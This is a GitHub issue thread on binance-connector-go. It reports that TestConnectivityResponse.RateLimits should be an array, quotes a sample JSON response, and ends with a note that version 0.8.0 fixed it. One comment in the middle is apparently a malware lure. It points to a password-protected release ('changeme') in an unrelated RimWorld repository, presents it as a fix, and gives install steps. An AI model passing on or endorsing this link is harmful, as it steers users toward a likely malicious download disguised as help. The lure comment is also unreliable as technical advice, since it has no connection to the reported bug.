### ISSUE TITLE
TestConnectivityResponse.RateLimits should be array

### ISSUE THREAD

**Issue by paveloborin** [binance/binance-connector-go#40]
https://github.com/binance/binance-connector-go/blob/d37282f6b91c573cd7f48a271db4903cacc9356e/websocket_api.go#L273

example of websocket_api test connectivity response:
`{"id":"09361d78-52e3-fe10-b6fc-fad5c19e13f3","status":200,"result":{},"rateLimits":[{"rateLimitType":"REQUEST_WEIGHT","interval":"MINUTE","intervalNum":1,"limit":6000,"count":21}]}`

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by alplabin** [comment]
This issue has been fixed in version 0.8.0
